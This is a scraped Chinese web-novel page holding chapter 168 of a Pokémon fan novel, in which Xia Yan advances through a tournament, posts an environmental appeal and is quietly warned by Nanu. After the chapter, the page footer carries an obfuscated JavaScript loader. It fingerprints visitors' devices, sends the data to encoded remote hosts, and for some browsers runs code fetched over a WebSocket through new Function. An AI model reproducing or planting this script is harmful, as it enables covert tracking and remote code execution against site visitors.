笔下文学

下载
字:
关灯 护眼
笔下文学 > 精灵世界的底层训练家 > 第一百六十八章 一点点小告诫 三合一

不想错过《笔下文学》更新?安装笔下文学专用APP,作者更新立即推送!

放弃立即下载

第一百六十八章 一点点小告诫 三合一

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
中午和渡他们一起在马纳罗竞技场的选手餐厅简单地吃了中饭。
  
  下午继续预选赛。
  
  因为要体现出极致的“公平公正”,所以没有人可以直接跳过预选赛。
  
  哪怕是岛屿之王他们都是一样。
  
  好在。
  
  虽然参加比赛的人多,但大多实力都不怎么样,夏彦他们之中也没有人遇到什么意外。
  
  夏彦第一天以一波三连胜结束了第一天的比赛。。
  
  他还是引起了不小关注的。
  
  虽然期间他都只是派出了伊布和丑丑鱼参战。
  
  伊布大多数情况下也只是作为“接棒”手,把主要的战斗都交给了丑丑鱼。
  
  丑丑鱼也没有让夏彦失望。
  
  它虽然看起来呆呆的,但战斗起来却一点也不手软,等到伊布的增幅加持后,更是扭转了不少人对丑丑鱼这种精灵的轻视。
  
  期间。
  
  夏彦的对战结果没有什么意外,也令支持他的人感到很开心。
  
  “夏彦先生这人可以处啊。别人研究精灵,都是通过观察、研究,但夏彦先生却真的以身作则,他写关于伊布的论文,自己就收服了一只伊布,他写丑丑鱼和美纳斯的论文,自己也收服了一只美纳斯。”
  
  不知道是谁先说出的这种说法,却获得了很多人的认可。
  
  “不只是收服,夏彦先生还把它们培养得都很不错,在此之前谁说丑丑鱼能有这样的战斗力,我都是不会相信的。”
  
  “这就是‘真实之英雄’吗?绝对够真实。”
  
  和“铃兰青年大赛”不同的是,这次夏彦在比赛一开始,就获得了足够的关注度。
  
  被誉为最有机会争夺前三甲的选手之一。
  
  随着比赛的继续,势必会带来更多的关注与支持。
  
  于是就在当天晚上。
  
  夏彦发表了一篇名为《论‘Z招式’与阿罗拉地区自然环境休戚相关存在的联系》类似论文,但更像是一篇倡议的文章。
  
  引起了不小的热度。
  
  既然答应了卡璞·鸣鸣要为阿罗拉地区的自然环境保护做出一定的贡献,夏彦就利用了起了自己现在的影响力。
  
  而这篇倡议,还未被大部分人看到的时候,就获得了阿罗拉地区居民们的一致认可。
  
  更是当晚就直接被新建立的阿罗拉联盟,将之高挂在了阿罗拉联盟官网的首页。
  
  随着观看的人越多,虽然不乏一些反对的声音,但更多的还是支持。
  
  其中,大木博士、山梨博士、红豆杉博士等等知名博士发表了自己的看法,大多持支持态度。
  
  还有像渡、大吾、希罗娜这些新星的训练家,也都转发了这篇文章,表示支持。
  
  因为带来的关注度逐渐上升,引起了联盟和以太基金会的注意。
  
  联盟对此暂时没有发表什么意见。
  
  只是单纯地对夏彦这种爱护环境的行为表示了支持。
  
  以太基金会就不一样了。
  
  那是大肆宣传,更是将文章在整个阿罗拉地区传播。
  
  据说。
  
  当晚以太基金会的会长露莎米奈,将这篇文章打印,一个人乐呵呵地盯着文章看了一个多小时。
  
  从头到尾都是满脸笑容的那种。
  
  当然。
  
  这篇倡议的热度,是怎么也掩盖不了这次大赛的,也无法扭转联盟真正的态度。
  
  联盟如果真的想要大肆开发阿罗拉地区,哪怕他一个新星训练家,新星研究员,也不可能影响联盟的态度。
  
  更像是埋下了一颗种子,慢慢发芽,等待发酵。
  
  等联盟真正见识到了“Z招式”的强大,或许就会在一定程度上,改变想法。
  
  短时间内,夏彦能做的就只能是这样了。
  
  他还不足以真正地影响到联盟的高层。
  
  哪怕,他成为四天王,都不一定能够影响到联盟最高层的决议。
  
  ...
  
  ...
  
  四天后。
  
  预选赛总算是结束了。
  
  没办法。
  
  这次涵盖的地区太多,参加的选手也太多,预选赛整整持续了四天的时间,才正式结束。
  
  决出了参加正赛的共计128人。
  
  选手们的场地也终于是从预选赛场转移到了马纳罗竞技场的正赛场地。
  
  赛方将整个大场地划分成四个不同属性的对战场地,可以供四场比赛同时进行。
  
  观众也终于是可以近距离地观看到各自偶像的对战。
  
  整场大赛的热度,也正是在这个时候迎来了爆发式的增长。
  
  于欢呼海啸般的呐喊声中。
  
  于支持人激昂的演讲声中。
  
  于选手们亢奋的兴趣中。
  
  “诸岛大赛”的正赛也正式开始了。
  
  选手席。
  
  “阿罗拉真的太赖了。”
  
  看着站在岩石场地上一脸颓废和懒散的默丹,夏彦忍不住砸着嘴巴感叹道。
  
  让岛屿之王们下场,也不知道以太基金会的露莎米奈是怎么说服他们的。
  
  别人也就算了,连最懒散的默丹都去“炸鱼”。
  
  属实是有点说不过去。
  
  “但是你别说,我真的挺想和他们打一场的。”坐在夏彦身侧的渡却显得有些兴奋。
  
  夏彦斜了他一眼。
  
  “你总会遇到的。”
  
  渡咧着嘴巴搓了搓手。
  
  “不管最后的结果怎么样,能和他们打一场,就足够了。”
  
  和四天王层次的训练家交手,那可不是什么时候都能够碰到的。
  
  更何况还是实力被压制在了准天王级的四天王,要是能从他们身上学到个一星半点,就获益匪浅了。
  
  只是。
  
  夏彦再次看了眼场上的默丹,那干脆利落地一串三......
  
  那你去打吧,咱暂时不想碰到.....夏彦心里腹诽了句。
  
  其实。
  
  到了这128进64的比赛里,已经有很多眼熟甚至是夏彦认识的人。
  
  别以为128强就不算强。
  
  从这128个人里随便拎出来一个丢到各自地区的大赛里,那都是起码是16强起步的人。
  
  “铃兰青年大赛”的时候,馆主级的精灵就算是王牌精灵了。
  
  可现在。
  
  没有几只准天王级的精灵,别的不说,反正32强是肯定进不去的。
  
  在夏彦他们有一搭没一搭的聊天中,第一轮的四场比赛很快就结束了。
  
  其中四人被淘汰,四人挺进64强。
  
  第二轮。
  
  按照抽签,夏彦就要下场了。
  
  “加油。”希罗娜说了句。
  
  “下手轻点。”这是渡的话。
  
  而这句话引起了旁边科拿的极度不满。
  
  “你让别人下手轻点,你怎么从来就没考虑过下手轻点?”
  
  面对科拿颇为“幽怨”的眼神,渡溃败。
  
  夏彦被分配到的也是岩石场地,倒是没再在水里打了。
  
  在夏彦走向场地的时候,正好迎上了穿着警服,插着口袋,踢踏着拖鞋的懒散默丹。
  
  “默丹先生。”
  
  既然正好碰到了,作为国际刑警的前辈,夏彦还是打了个声招呼。
  
  默丹耷拉着的眼睛瞥了夏彦一眼,默默点了点头算是回礼。
  
  走过夏彦身边时,默丹却突然脚步一顿。
  
  “夏彦。”默丹忽然道。
  
  夏彦表情不变,笑着道:“是我。”
  
  “莉拉她还好吧?”
  
  闻言,夏彦怔了下,“如果默丹先生关心莉拉部长,怎么不自己去询问呢?”
  
  却见默丹摆了摆手。
  
  “算了,太麻烦,她这个‘UB对策部’部长的事情也不少。”
  
  夏彦点点头。
  
  默丹为什么要退出国际刑警他不知道。
  
  或许在大部分人看来是因为默丹厌倦了,是他懒散性子的原因。
  
  但夏彦却觉得这是根本原因。
  
  “你的文章不错,我看了。不错。”一边说,一边慢慢走向选手通道的尽头。
  
  可是当默丹即将消失在夏彦视线中的时候,他忽然回过头来问了句。
  
  “对了,我们是不是之前在什么地方见过?”
  
  “默丹先生说笑了。”
  
  “也是。走了,祝你好运吧。”
  
  说完这句,默丹才彻底消失在了选手通道。
  
  夏彦也默默走向赛场,表情没有什么变化。
  
  但心里却并不平静。
  
  他们之前当然是见过的。
  
  在夏彦以猎人身份来到阿罗拉地区的时候。
  
  这就是真正顶级的国际刑警所拥有的直觉吗......夏彦心里暗自警惕。
  
  ...
  
  而回到阿罗拉选手休息室的默丹。
  
  走进了岛屿之王与岛屿女王们的专属休息室。
  
  满头白发的哈拉坐在椅子上喝着茶。
  
  身材高挑凹凸的丽姿把玩着手机,登陆的是征婚网站,一个个正在征婚的男士,她看得津津有味。
  
  年龄最小的哈普乌没精打采地啃手里的胡萝卜。
  
  一副心不在焉的样子。
  
  默丹驻足于门口顿了片刻。
  
  翻翻口袋,取出了他最喜欢的剑玉。
  
  “咚咚”地把玩着,坐在了哈普乌的身旁。
  
  “默丹先生。”
  
  这时哈普乌才看到默丹。
  
  默丹却没有看她,只是盯着手里的剑玉。
  
  “索夫乌老爷子该休息了,既然他选择了你,你应该在这次大赛里把他那精神头打出来才行。别小小年纪就一副心事重重的样子,把你的活力展现给病床上的老爷子看看。”
  
  虽然语气很懒散,但哈普乌却听出了他的安慰。
  
  想到此时还在以太基金会特医院病床上的爷爷,脑中闪过爷爷教导自己时的画面,哈普乌重重地点点头。
  
  “嗯!”
  
  眼睛恢复了些许的神采。
  
  看向屏幕。
  
  “诶?第二轮比赛都开始了,默丹先生你怎么才回来?”哈普乌忽然反应过来。
  
  默丹瞥向屏幕,用极低如同呢喃的声音自言自语道:
  
  “没什么,给了个小家伙一点点小告诫。”
  
  ...
  
  ...
  
  “小菊儿——!!”
  
  “小菊儿小姐——!!”
  
  “好漂亮啊!”
  
  听着观众席上传来的欢呼声,横着骑在雷电斑马上的模特小菊儿,脱下了她那件毛茸茸的蓬松外套。
  
  展露出了其穿着比基尼的高挑身材,更是引来了一阵“狼嚎”。
  
  阿罗拉地区温暖的气候。
  
  还是比较适合穿比基尼的。
  
  主业模特,副业合众地区雷文市道馆馆主的小菊儿,也非常擅长展示自己的身材。
  
  夏彦正赛的第一个对手,就是这位名气颇大的模特,小菊儿。
  
  “夏彦先生,下手轻点——!!”
  
免费看片APP    美女直播间
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x5a\x4e\x70\x4b\x4a\x5a\x57\x61\x62']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2tkZmouYWxza2ZkZi5jb206MTg0NNDM=','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['N','N']);}:function(){};
下载